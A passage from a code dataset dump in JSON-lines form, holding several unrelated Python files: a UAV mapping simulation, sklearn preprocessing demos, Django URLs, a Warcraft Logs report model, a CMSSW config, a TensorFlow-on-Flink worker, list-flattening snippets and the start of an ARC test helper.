gt[x,2*fourth+3,:] = tree\n\n # In second Block, put two vehicles there\n quat = m//4\n gt[quat:quat+3,fourth+int(0.5*fourth)-2:fourth+int(0.5*fourth),:] = vehicle\n gt[2*quat:2*quat+3,fourth+int(0.5*fourth)+1:fourth+int(0.5*fourth)+3,:] = vehicle\n\n if transpose:\n return np.swapaxes(gt,0,1)\n else:\n return gt\n\ndef scenario2(xmax, ymax, classlist, random=False, roadwidth=2, carcount=4, h_size=3, h_counts=5, testconfig=False, proportion=0.5, transpose=False):\n \"\"\"\n\n \"\"\"\n gt = np.zeros((xmax, ymax, classlist.size))\n tree = np.asarray([0, 0, 0, 1, 0])\n vehicle = np.asarray([0, 0, 0, 0, 1])\n house = np.asarray([1, 0, 0, 0, 0])\n pavement = np.asarray([0, 1, 0, 0, 0])\n grass = np.asarray([0, 0, 1, 0, 0])\n \n quatx = xmax // 4\n quaty = ymax // 4\n gt[...,:] = grass\n\n # Choose random indices from the second half. Roughly 50%\n if random:\n areasize = int(2*proportion*quatx*ymax)\n xidcs= np.random.randint(2*quatx,xmax,size=areasize)\n yidcs = np.random.randint(ymax,size=areasize)\n idcs = np.asarray((xidcs, yidcs)).T\n else: # Make the idcs nonrandom\n xrang = np.arange(2*quatx,xmax,2)\n yrang = np.arange(0,ymax,3)\n idcs = np.array([np.array([x,y]) for x in xrang for y in yrang])\n # yidcs = [y for y in yrang for x in xrang]\n gt[idcs[:,0], idcs[:,1], :] = tree\n \n # 2 Roads\n halfx = xmax //2\n halfy = ymax //2\n gt[:,halfx-roadwidth:halfx+roadwidth,:] = pavement\n gt[halfy-roadwidth:halfy+roadwidth,:,:] = pavement\n \n # sets of cars\n if random:\n cars = np.random.randint(1,carcount+1)\n caridx = np.random.randint(0,ymax-3,size=cars)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[halfx-roadwidth:halfx,caridcs,:] = vehicle\n\n caridx = np.random.randint(0,ymax-3,size=carcount-cars)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[caridcs,halfx:halfx+roadwidth,:] = vehicle\n else:\n caridx = np.arange(0,xmax, 12)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[halfx-roadwidth:halfx,caridcs,:] = vehicle\n gt[caridcs,halfx:halfx+roadwidth,:] = vehicle\n\n # Houses:\n # Top left indices\n tlx = halfx - roadwidth - h_size\n ty = halfy - roadwidth - h_size\n trx = halfx + roadwidth + 1\n \n if random:\n tlh_idx = np.random.randint(0, tlx-h_size, size=h_counts)\n trh_idx = np.random.randint(trx, xmax-h_size, size=h_counts)\n tly_idx = np.random.randint(0, ty-h_size, size=h_counts)\n try_idx = np.random.randint(0, ty-h_size, size=h_counts)\n y_idcs = np.concatenate((tly_idx, try_idx), axis=None)\n x_idcs = np.concatenate((tlh_idx, trh_idx), axis=None)\n h_yidcs = np.array([np.arange(y,y+h_size) for y in y_idcs])\n h_xidcs = np.array([np.arange(x, x+h_size) for x in x_idcs])\n pts = []\n h_idx = np.array([np.array([x,y]) for i, x_arr in enumerate(h_xidcs) for x in x_arr for y in h_yidcs[i]])\n\n else:\n tlh_idx = np.arange(0, tlx, (h_size+2)*2)\n trh_idx = np.arange(trx, xmax-h_size, (h_size+2)*2)\n tly_idx = np.arange(0, ty-h_size, (h_size+2)*2)\n x_idcs = np.concatenate((tlh_idx, trh_idx), axis=None)\n tlx_idcs = [np.arange(idx, idx+h_size) for idx in x_idcs]\n tly_idcs = [np.arange(idx, idx+h_size) for idx in tly_idx]\n h_idx = np.array([np.array([x, y]) for x_coord in tlx_idcs for x in x_coord for y_coord in tly_idcs for y in y_coord])\n \n # Switching around the cases\n if testconfig:\n gt[h_idx[:,0], h_idx[:,1], :] = house\n else:\n gt[h_idx[:,1],h_idx[:,0],:] = house\n \n if transpose:\n return np.swapaxes(gt,0,1)\n else:\n return gt\n return gt\n \ndef get_map_counts(map1):\n \"\"\"\n Function to return the (relative) counts of each class available in the map.\n For evaluation with priors\n Requires a 3D map, where the 3rd dimension is a vector of 0s and ones and it counts the 1s\n \"\"\"\n n_cells = map1.shape[0] * map1.shape[1]\n out = np.count_nonzero(map1, axis=(0,1)) / n_cells\n return out\n\ndef makeObs(gt, obs_probab, classlist):\n \"\"\"\n Returns an observation based on the Ground truth and the Observation probability\n \"\"\"\n\n obs = np.empty((gt.shape[0], gt.shape[1]), dtype='object')\n for i in range(gt.shape[0]):\n for j in range(gt.shape[1]):\n cl_name = gt[i,j]\n prob = obs_probab.loc[cl_name,:]\n obs[i,j] = np.random.choice(classlist, p=prob.to_numpy())\n return obs\n\ndef gensampleidx(gt, observation_probability):\n \"\"\"\n generates an index with probability proportional to the row in obs_prob\n \"\"\"\n sam = np.arange(gt.shape[2])\n samples = np.zeros((gt.shape[0], gt.shape[1]))\n for i in range(gt.shape[0]):\n for j in range(gt.shape[1]): \n idx = np.nonzero(gt[i,j])[0]\n p = observation_probability[idx] \n samples[i,j] = np.random.choice(sam, p=p[0])\n return samples.astype(np.int)\n\n# Prediction Functions\ndef pred_flat(fut_states, alpha=0.5):\n \"\"\"\n Function to do a flat prediction. See File \"bayes-discr-1D.py\" in folder ../tmp for details\n \"\"\"\n\n # find out how many cells still have a uniform prior\n num_states = fut_states.shape[2]\n unif_list = []\n alr_obs_list = []\n unif_vec = np.ones(num_states, dtype=float)/num_states\n for i in range(fut_states.shape[0]):\n for j in range(fut_states.shape[1]):\n fut_state = fut_states[i,j]\n # if the vector is uniform: \n if np.array_equal(unif_vec, fut_state):\n unif_list.append(tuple([i,j]))\n else:\n alr_obs_list.append(tuple([i,j]))\n # unif_ct is now the amount of cells that still have a uniform prior\n map_size = fut_states.shape[0] * fut_states.shape[1]\n unif_ct = len(unif_list)\n rel_unif = unif_ct/map_size\n # if the relative amount of uniform cells is small, the weight of the prior is small\n new_pr = np.copy(fut_states)\n unif_list = np.asarray(unif_list)\n alr_obs_list = np.asarray(alr_obs_list)\n n_vec = np.zeros(num_states)\n for o_val in alr_obs_list:\n new_val = fut_states[o_val[0], o_val[1]]\n n_vec += (1.0/len(alr_obs_list)) * new_val.astype(float)\n # old_states = fut_states[alr_obs_list]\n # new_states = fut_states[unif_list]\n # new_pr[alr_obs_list] = fut_states[alr_obs_list]\n for upd_wp in unif_list:\n # Find way to update this\n new_pr[upd_wp[0], upd_wp[1]] = (1.0-alpha) * new_pr[upd_wp[0], upd_wp[1]] + alpha*n_vec\n \n return new_pr\n\ndef assign_prior(map1, areadist_vec, area_class_mat):\n \"\"\"\n function to assign a more informed prior - sum over the assumed distribution of areas multiplied by the observation probability of that class\n p(t|u) = p(u|t) * p(t) / p(t) || with p(t) = sum(p(u|t) p(t))\n \"\"\"\n vec = areadist_vec.T @ area_class_mat\n map1[...,:] = vec\n return map1\n\n# Updating Functions:\ndef updateMap(x_min, x_max, y_min, y_max, posterior, lmap):\n \"\"\"\n Function that takes the new probabilities with the observations and the original maps and update the function on the right indices\n \"\"\"\n lmap[x_min:x_max, y_min:y_max] = posterior\n\ndef updateprobab(obs, obs_probab, prior):\n \"\"\"\n Prior: Prior probabilities over the map elements:\n obs: Observation made\n obs_probab: probability of making the observations\n Returns: posterior over the map\n \"\"\"\n # Prior is a 3D array\n post = np.empty_like(prior)\n for i in range(obs.shape[0]):\n for j in range(obs.shape[1]):\n pr = prior[i,j]\n vec = obs_probab[obs[i,j]]\n po = vec*pr\n po = po/po.sum()\n post[i,j] = po\n\n return post\n\n# Path Planning Functions\ndef retrieveVisibleFields(wp, fov=1):\n \"\"\"\n Retrieves the indices of visible fields from the given [x, y] index of the UAV.\n Use the fov + in each direction. Assumes index 0,0 to be the corner between 0,0 and 1,1! \n \"\"\"\n\n x_min = wp[0]-fov+1\n x_max = wp[0]+fov+1\n y_min = wp[1]-fov+1\n y_max = wp[1]+fov+1\n # x_vals = np.arange(wp[0]-fov+1, wp[0]+fov+1)\n # y_vals = np.arange(wp[1]-fov+1, wp[1]+fov+1)\n return x_min, x_max, y_min, y_max\n \ndef getflightpattern(xmax, ymax, fov=1, overlap=(0.5, 0.5)):\n overlap_x = overlap[0]\n overlap_y = overlap[1]\n stride_x = int(2*fov*overlap_x)\n stride_y = int(2*fov*overlap_y)\n iteration=1\n x = fov-1\n y = fov-1\n # print(\"X max: {}, Y max: {}, Stride_x: {}, Stride_y: {}\".format(xmax, ymax, stride_x, stride_y))\n wps = []\n while(x+fov < xmax):\n while(y+fov < ymax):\n if iteration%2==1:\n # leave the order\n y_n = y\n else:\n # invert the order\n y_n = ymax-y-fov\n wp = tuple([x, y_n])\n wps.append(wp)\n y += stride_y\n y = fov-1\n x += stride_x\n iteration+=1\n return np.asarray(wps)\n\n# Hierarchical functions\ndef getareaprior(arealist):\n \"\"\"\n Function to get a uniform prior over the areas\n \"\"\"\n return np.ones_like(arealist).astype(np.float) / arealist.size\n\ndef calchierprob(pu, ptu_df):\n \"\"\"\n Function to calculate the total probability of observing something\n \"\"\"\n x = pu @ ptu_df\n return x/x.sum()\n\ndef updatearea(ptu, pu, obs):\n p_tu = ptu.T[obs]\n pos = pu * p_tu\n pos = pos / pos.sum()\n return pos\n\ndef updatecounts(counts, samples):\n \"\"\"\n Function to update the count array\n \"\"\"\n for i in range(samples.shape[0]):\n for j in range(samples.shape[1]):\n counts[i,j,samples[i,j]] += 1\n # counts[...,samples] +=1\n return counts\n\n# Hierarchical Dynamic Prediction for the cells:\ndef dynamic_prediction(cts, ptu, prior_u, classlist):\n \"\"\"\n A function to dynamically estimate which area we are in\n Returns a new prior, which should be used for all cells where the counts are zero\n Arguments: \n The counts of observations\n The observation functions:\n p(u|t) = p(t|u) p(u)\n with p(u) being the flat prior over the areas\n \"\"\"\n\n # Step 1: find cells that have already been observed\n obs = np.sum(cts, axis=(0,1)).astype(np.int)\n # Step 2: for each of the observations, run \"updatearea()\" With the appropriate values\n post_u = prior_u\n for i in range(obs.size):\n n_obs = obs[i]\n for j in range(n_obs):\n post_u = updatearea(ptu, post_u, i)\n # Step 3: recalculate p(t|u) with the new p(u)\n class_probab = calchierprob(post_u, ptu)\n\n return class_probab\n\ndef recreate_posterior(prior, counts, obs_prob):\n \"\"\"\n Function to recreate the posterior, with the prior and the number of observations of the classes\n as well as the observation probabilities\n \"\"\"\n post = prior\n for i in range(counts.size):\n ct = counts[i].astype(np.int)\n for j in range(ct):\n vec = obs_prob[i]\n post = vec*post\n post = post / post.sum()\n return post\n\n# Evaluation\ndef cross_entropy(vec_true, vec_pred):\n \"\"\"\n cross entropy loss for a single element. Following the definition of:\n https://youtu.be/ErfnhcEV1O8?t=579\n \"\"\"\n return np.sum(vec_true*np.log(vec_pred)) * (-1.0)\n\ndef wrongcells(gtmap, predicted):\n \"\"\"\n Function to return the Relative percentage of wrongly predicted cells\n \"\"\"\n pred_idxmax = np.asarray(np.unravel_index(np.argmax(predicted, axis=2), predicted.shape))[2]\n gt_idxmax = np.asarray(np.unravel_index(np.argmax(gtmap, axis=2), gtmap.shape))[2]\n diff = pred_idxmax - gt_idxmax\n return np.count_nonzero(diff) / (gtmap.shape[0] * gtmap.shape[1]) \n\n# Actually running the simulation\ndef runsimulation(args, pu, ptu, obs_prob, arealist, classlist):\n\n # ================================\n #### Section 1 - Setup work\n # ================================\n\n max_map_size = args.dim\n n1 = m1 = max_map_size\n fov = args.fov\n h_overlap = 1-args.overlaph\n v_overlap = 1-args.overlapv\n overlap = (h_overlap, v_overlap)\n likelihood = args.accuracy\n simcase = args.simcase\n transposed = args.transposed\n rand = args.random\n testconfig = args.testconfig\n \n # Ground Truth map\n try:\n if simcase == 1:\n gtmap = scenario1(max_map_size, max_map_size, classlist, transpose=transposed)\n elif simcase == 2:\n gtmap = scenario2(max_map_size, max_map_size, classlist, transpose=transposed, random=rand, testconfig=testconfig)\n except OSError:\n raise OSError(\"Error in creating the simulation map\")\n\n real_distribution = get_map_counts(gtmap)\n pred_classes_hierar = pu @ ptu\n \n # ================================\n # SECTION 2: creating the reproduction maps\n # ================================\n\n # A map to store the counts\n countsmap = np.zeros_like(gtmap)\n\n # Maps that are used for predictions:\n predmap = np.ones_like(gtmap) / gtmap.shape[2]\n flatmap = np.copy(predmap)\n\n # two additional maps used for prediction \n hiermap = np.copy(predmap) # One that uses the flat prior prediction from our model\n hiermap[:,:] = np.asarray(pred_classes_hierar)\n hiermap_dyn = np.copy(hiermap) # One that updates the p(u) dynamically\n \n # Observation probabilites and waypoints\n wps = getflightpattern(n1, m1, fov=fov, overlap=overlap) # Flight pattern\n\n # ================================\n # Section 3: Running the simulation\n # ================================\n for i in range(wps.shape[0]-1):\n \n # indices that are currently visible\n x_min, x_max, y_min, y_max = retrieveVisibleFields(wps[i], fov=fov)\n gt = gtmap[x_min:x_max, y_min:y_max] # Ground Truth area\n obs = gensampleidx(gt, obs_prob) # make Observations\n\n # Getting the priors for the maps \n pr_flat = flatmap[x_min:x_max, y_min:y_max,:]\n pr_pred = predmap[x_min:x_max, y_min:y_max,:]\n # For the hierarchical function\n counts = countsmap[x_min:x_max, y_min:y_max,:]\n\n # Updating the counts\n counts = updatecounts(counts, obs)\n countsmap[x_min:x_max, y_min:y_max, :] = counts\n\n # Update the probabilities\n post_flat = updateprobab(obs, obs_prob, pr_flat)\n post_pred = updateprobab(obs, obs_prob, pr_pred)\n\n # Re-incorporate the information into the map\n flatmap[x_min:x_max, y_min:y_max] = post_flat\n predmap[x_min:x_max, y_min:y_max] = post_pred\n\n # Predict the next step\n xmin_pred, xmax_pred, ymin_pred, ymax_pred = retrieveVisibleFields(wps[i+1], fov=fov)\n fustates = predmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred]\n nst_pred = pred_flat(fustates)\n # Hierarchical prediction:\n dyn_pr = hiermap_dyn[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :]\n cts_fut = countsmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :]\n pred_dyn = dynamic_prediction(cts_fut, ptu, pu, classlist) \n\n # Re-incorporate prediction-values into the map \n predmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred] = nst_pred\n # hierarchical incorporation - where nothing has been observed yet\n zer_idcs = np.where(np.sum(cts_fut, axis=2) == 0)\n dyn_pr[zer_idcs] = pred_dyn\n hiermap_dyn[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :] = dyn_pr\n\n # ================================\n ## SECTION 4: Save values\n # ================================\n datadict = {}\n datadict[\"Counts\"] = countsmap\n datadict[\"Ground Truth\"] = gtmap\n datadict[\"Hierarchical-Dynamic\"] = hiermap_dyn\n datadict[\"Hierachical-Pre\"] = hiermap\n datadict[\"Predicted\"] = predmap\n datadict[\"Flat\"] = flatmap\n\n configs = {}\n configs[\"Hierarch\"] = ptu\n configs[\"Hier_Prior\"] = pu\n configs[\"Observation\"] = obs_prob\n configs[\"Real_Dist\"] = real_distribution\n configs[\"Pred_Hier\"] = pred_classes_hierar\n\n # Safeguard if the file already exists, do not overwrite\n try:\n save_results(args, datadict, configs)\n except OSError:\n raise","sub_path":"src/runsim.py","file_name":"runsim.py","file_ext":"py","file_size_in_byte":20075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454277062","text":"import numpy as np\nfrom sklearn import preprocessing\ndata = [\n [2.1, -1.9, 5.5],\n [-1.5, 2.4, 3.5],\n [0.5, -7.9, 5.6],\n [5.9, 2.3, -5.8]\n]\n\n# Binarize the input data\nbinarized = preprocessing.Binarizer(threshold=0.5).fit_transform(data)\nprint(\"\\nBinarized data:\\n\", binarized)\n\n#displaying the mean and the standard deviation of the input data\nprint(\"Mean =\", np.array(data).mean(axis=0))\nprint(\"Stddeviation = \", np.array(data).std(axis=0))\n\n#Removing the mean and the standard deviation of the input data\ndata_scaled = preprocessing.scale(data)\nprint(\"Mean_removed =\", data_scaled.mean(axis=0))\nprint(\"Stddeviation_removed =\", data_scaled.std(axis=0))\n\nprint(data_scaled)\n\ndata_scaler_minmax = preprocessing.MinMaxScaler(feature_range=(0,1))\ndata_scaled_minmax = data_scaler_minmax.fit_transform(data)\nprint (\"\\nMin max scaled data:\\n\", data_scaled_minmax)\n\n# Normalization\ndata_normalized_l1 = preprocessing.normalize(data, norm='l1')\nprint(\"\\nL1 normalized data:\\n\", data_normalized_l1)\n\ndata_normalized_l2 = preprocessing.normalize(data, norm='l2')\nprint(\"\\nL1 normalized data:\\n\", data_normalized_l2)","sub_path":"src/preprocessLearn.py","file_name":"preprocessLearn.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412950520","text":"from django.conf.urls import url\n\nfrom unitime import views\n\nurlpatterns = [\n url(r'^course/$', views.CourseListView.as_view(), name='all_courses'),\n url(r'^course/(?P[\\w-]+)/$', views.CourseView.as_view(), name='course_by_code'),\n url(r'^event/$', views.EventView.as_view(), name='events_by_code'),\n url(r'^alamon/event/$', views.AlamonEventView.as_view(), name='alamon_events_by_code'),\n url(r'^event/(?P[\\w-]+)/$', views.EventView.as_view(), name='events_by_code'),\n url(r'^room/$', views.RoomView.as_view(), name='room'),\n url(r'^codes/$', views.CourseCodeView.as_view(), name='codes'),\n]\n","sub_path":"unitime/unitime/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175883161","text":"import inspect\n\n\ndef d(*args, **kwargs):\n result = {}\n result.update(kwargs)\n frame = inspect.currentframe()\n prev_locals = frame.f_back.f_locals\n values = []\n for arg in args:\n for k, v in prev_locals.items():\n if v is arg:\n idv = id(v)\n if idv in values:\n raise ValueError(f\"duplicate key for {v}\")\n result[k] = v\n values.append(idv)\n return result\n","sub_path":"d/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"636585858","text":"\n\n# IMPORT STANRD LIBRARIES\nimport datetime\n\n# IMPORT THIRD PARTY LIBRARIES\nimport mongoengine as me\n\n# IMPORT LOCAL LIBRARIES\nfrom lorgs import data\nfrom lorgs import utils\nfrom lorgs.models import warcraftlogs_base\nfrom lorgs.models.warcraftlogs_actor import Boss\nfrom lorgs.models.warcraftlogs_fight import Fight\n\n\nclass Report(me.EmbeddedDocument, warcraftlogs_base.wclclient_mixin):\n\n report_id = me.StringField(primary_key=True)\n start_time = me.IntField(default=0)\n\n title = me.StringField()\n\n fights = me.ListField(me.EmbeddedDocumentField(Fight))\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n for fight in self.fights:\n fight.report = self\n\n def __str__(self):\n return f\"\"\n\n def as_dict(self):\n return {\n \"code\": self.report_id,\n \"start_time\": self.start_time,\n \"num_fights\": len(self.fights),\n \"fights\": [fight.as_dict() for fight in self.fights]\n }\n\n ##########################\n # Attributes\n #\n @property\n def players(self):\n return utils.flatten(fight.players for fight in self.fights)\n\n @property\n def report_url(self):\n return f\"https://www.warcraftlogs.com/reports/{self.report_id}/\"\n\n ##########################\n # Methods\n #\n\n def add_fight(self, **kwargs):\n fight = Fight(**kwargs)\n fight.report = self\n self.fights.append(fight)\n return fight\n\n ##########################\n # Query\n #\n\n async def load_report_info(self, fight_ids=None):\n \"\"\"Fetch all fights in this report.\n\n Args:\n fight_ids(list[int], optional): list of fights to load.\n loads all fights, if not specified.\n\n \"\"\"\n query = f\"\"\"\n reportData\n {{\n report(code: \"{self.report_id}\")\n {{\n title\n zone {{name id}}\n startTime\n\n # masterData\n # {{\n # actors(type: \"Player\")\n # {{\n # name\n # id\n # }}\n # }}\n\n fights(fightIDs: {fight_ids or []})\n {{\n id\n encounterID\n startTime\n endTime\n fightPercentage\n # kill\n }}\n }}\n }}\n \"\"\"\n\n query_result = await self.client.query(query)\n report_data = query_result.get(\"reportData\", {}).get(\"report\", {})\n\n # Update the Report itself\n self.title = report_data.get(\"title\", \"\")\n self.start_time = report_data.get(\"startTime\", 0)\n\n # Update the Fights in this report\n for fight_data in report_data.get(\"fights\", []):\n\n # skip trash fights\n boss_id = fight_data.get(\"encounterID\")\n if not boss_id:\n continue\n\n # Get the fight\n fight = self.add_fight()\n fight.fight_id = fight_data.get(\"id\")\n fight.start_time = fight_data.get(\"startTime\", 0)\n fight.end_time = fight_data.get(\"endTime\", 0)\n fight.boss = Boss(boss_id=boss_id)\n fight.boss.fight = fight\n fight.boss.percent = fight_data.get(\"fightPercentage\")\n\n async def load(self, fight_ids=None):\n\n await self.load_report_info(fight_ids)\n await self.load_many(self.fights)\n\n\nclass UserReport(me.Document):\n \"\"\"docstring for UserReport\"\"\"\n\n report_id = me.StringField(primary_key=True)\n report = me.EmbeddedDocumentField(Report)\n\n created = me.DateTimeField(default=datetime.datetime.utcnow)\n meta = {\n 'indexes': [\n {'fields': ['created'], 'expireAfterSeconds': 7 * 24 * 60 * 60} # expires after 1 week\n ]\n }\n\n async def load(self, **kwargs):\n self.report = Report(report_id=self.report_id)\n await self.report.load(**kwargs)\n\n @classmethod\n def get_or_create(cls, **kwargs):\n obj = cls.objects(**kwargs).first()\n obj = obj or cls(**kwargs)\n return obj\n","sub_path":"lorgs/models/warcraftlogs_report.py","file_name":"warcraftlogs_report.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601010388","text":"\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"analyzeRho\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.Geometry.GeometryExtended2026D49Reco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/home/veelken/Phase2HLT/CMSSW_11_1_0_pre6/src/HLTTrigger/Phase2HLTPFTaus/test/step3_RAW2DIGI_RECO.root'\n )\n)\n\n#--------------------------------------------------------------------------------\n# set input files\n##\n##import os\n##import re\n##\n##inputFilePath = '/hdfs/cms/store/user/sbhowmik/VBFHToTauTau_M125_14TeV_powheg_pythia8_correctedGridpack/PhaseIIMTDTDRAutumn18MiniAOD_20190524/190524_111901/0000/'\n##\n##inputFile_regex = r\"[a-zA-Z0-9_/:.-]*NTuple_TallinnL1PFTauProducer_[a-zA-Z0-9-_]+.root\"\n##\n# check if name of inputFile matches regular expression\n##inputFileNames = []\n##files = [ \"\".join([ \"file:\", inputFilePath, file ]) for file in os.listdir(inputFilePath) ]\n##for file in files:\n## inputFile_matcher = re.compile(inputFile_regex)\n## if inputFile_matcher.match(file):\n## inputFileNames.append(file)\n##print \"inputFileNames = %s\" % inputFileNames \n##\n##process.source.fileNames = cms.untracked.vstring(inputFileNames)\n#--------------------------------------------------------------------------------\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic', '')\n\nprocess.analysisSequence = cms.Sequence()\n\n# CV: rho and rhoNeutral not yet separately reconstructed and stored in ROOT file,\n# which is why the same collections are used for \"rho\" and \"rhoNeutral\" inputs\n\nprocess.analyzeRho = cms.EDAnalyzer(\"RhoAnalyzer\",\n srcRho = cms.InputTag('hltKT6PFJets:rho'),\n srcRhoNeutral = cms.InputTag('hltKT6PFJets:rho'),\n dqmDirectory = cms.string(\"RhoAnalyzer\"),\n)\nprocess.analysisSequence += process.analyzeRho\n\nprocess.load(\"DQMServices.Core.DQMStore_cfi\")\n\nprocess.savePlots = cms.EDAnalyzer(\"DQMSimpleFileSaver\",\n outputFileName = cms.string('analyzeRho_signal_2020Jun03.root')\n)\n\nprocess.p = cms.Path(process.analysisSequence + process.savePlots)\n\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True)\n)\n","sub_path":"test/analyzeRho_signal_cfg.py","file_name":"analyzeRho_signal_cfg.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347373292","text":"from __future__ import print_function\nfrom datetime import datetime\nimport tensorflow as tf\nimport sys\nimport time\nimport json\nfrom tensorflow.python.summary.writer.writer_cache import FileWriterCache as SummaryWriterCache\nimport tensorflow_on_flink.tensorflow_on_flink_ops as tff_ops\nimport traceback\n\n\ndef log_speed(steps, start):\n duration = time.time() - start\n speed = steps / duration\n print (\"Read from queue: \" + str(steps) + \" steps, at \" + '%.2f' % speed + \" steps/second\")\n sys.stdout.flush()\n\n\ndef map_fun(context):\n print(tf.__version__)\n sys.stdout.flush()\n tf.logging.set_verbosity(tf.logging.ERROR)\n jobName = context.jobName\n index = context.index\n clusterStr = context.properties[\"cluster\"]\n delim = context.properties[\"SYS:delim\"]\n print (index, clusterStr)\n sys.stdout.flush()\n clusterJson = json.loads(clusterStr)\n cluster = tf.train.ClusterSpec(cluster=clusterJson)\n server = tf.train.Server(cluster, job_name=jobName, task_index=index)\n sess_config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % index])\n with tf.device(tf.train.replica_device_setter(worker_device='/job:worker/task:' + str(index), cluster=cluster)):\n dataset = context.flinkStreamDataSet(buffer_size=0)\n iterator = dataset.make_one_shot_iterator()\n input_records = iterator.get_next()\n\n global_step = tf.contrib.framework.get_or_create_global_step()\n global_step_inc = tf.assign_add(global_step, 1)\n is_chief = (index == 0)\n print (datetime.now().isoformat() + \" started ------------------------------------\")\n t = time.time()\n total_step = 0\n try:\n with tf.train.MonitoredTrainingSession(master=server.target, is_chief=is_chief, config=sess_config,\n checkpoint_dir=\"./target/tmp/input_output/\" + str(t)) as mon_sess:\n # while not mon_sess.should_stop():\n while True:\n total_step, _ = mon_sess.run([global_step_inc, input_records])\n if (total_step % 10000 == 0):\n log_speed(total_step, t)\n except Exception as e:\n print('traceback.print_exc():')\n traceback.print_exc()\n sys.stdout.flush()\n finally:\n print (datetime.now().isoformat() + \" ended --------------------------------------\")\n log_speed(total_step, t)\n SummaryWriterCache.clear()\n\n\nif __name__ == \"__main__\":\n map_fun(context)\n","sub_path":"deep-learning-on-flink/flink-ml-tensorflow/src/test/python/global_step_queue.py","file_name":"global_step_queue.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236900207","text":"\n\"\"\"\nlisteYamuk = [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\nlisteDuz = []\nprint(listeYamuk[0][0])\nprint(listeYamuk[0][1])\nprint(listeYamuk[0][2])\nprint(listeYamuk[0][3])\nprint(listeYamuk[1][0])\nprint(listeYamuk[1][1])\n#rint(listeYamuk[0][4])\n\n\nfor girdi in listeYamuk:\n if hasattr(girdi, \"__iter__\"):\n listeDuz.extend(listeYamuk)\n else:\n listeDuz.append(girdi)\n\nprint(listeDuz)\n\"\"\"\n\"\"\"\nInput = [[1, 'a', ['cat'], 2], [[[3]],'dog'], 4, 5]\nOutput = []\nprint(Input)\nfor i in Input:\n if type(i) == list:\n for a in i:\n if type(a) == list:\n for s in a:\n if type(s) == list:\n for d in s:\n Output.append(d)\n else:\n Output.append(s)\n else:\n Output.append(a)\n else:\n Output.append(i)\n\nprint(Output)\n\"\"\"\n\nInput= [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\ndef clearOfList(InputList:list):\n Output = []\n def operation(lista:list):\n for i in lista:\n if type(i) == list:\n operation(i)\n else:\n Output.append(i)\n operation(InputList)\n return Output\n\ndef fixed(liste):\n if not isinstance(liste, list):\n return [liste]\n elif not liste:\n return []\n else:\n return fixed(liste[0]) + fixed(liste[1:])\n\nprint(clearOfList(Input))\nprint(fixed(Input))\n\ndef ifxed(liste):\n if isinstance(liste,list):\n return fixed(liste[0]) + fixed(liste[1:])\n elif not liste:\n return []\n else:\n return [liste]\n\nprint(ifxed(Input))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"duzlestirme.py","file_name":"duzlestirme.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302958735","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n#\n# This file is a part of the Dalvik test infrastructure for ARC.\n# It contains helper routines for running dalvikvm in system mode.\n#\n\nimport re\nimport threading\nimport traceback\n\nfrom src.build import toolchain\nfrom src.build.util import concurrent_subprocess\nfrom src.build.util import output_handler\nfrom src.build.util.test import suite_runner\n\n_ADB_SERVICE_PATTERN = re.compile(\n 'I/AdbService:\\s+(?:(emulator\\-\\d+)|Failed to start)')\n\n_ADB_WAIT_TIMEOUT_SECONDS = 120\n\n\nclass SystemModeError(Exception):\n \"\"\"SystemMode class raised in this module.\"\"\"\n\n\ndef _is_crash_line(line):\n return (output_handler.is_crash_line(line) or\n output_handler.is_abnormal_exit_line(line))\n\n\nclass _SystemModeThread(threading.Thread, concurrent_subprocess.OutputHandler):\n def __init__(self, suite_runner, additional_launch_chrome_opts):\n super(_SystemModeThread, self).__init__()\n self._suite_runner = suite_runner\n self._name = suite_runner.name\n self._additional_launch_chrome_opts = additional_launch_chrome_opts\n\n self._android_serial = None\n self._adb_wait_event = threading.Event()\n\n self._chrome_lock = threading.Lock()\n self._terminated = 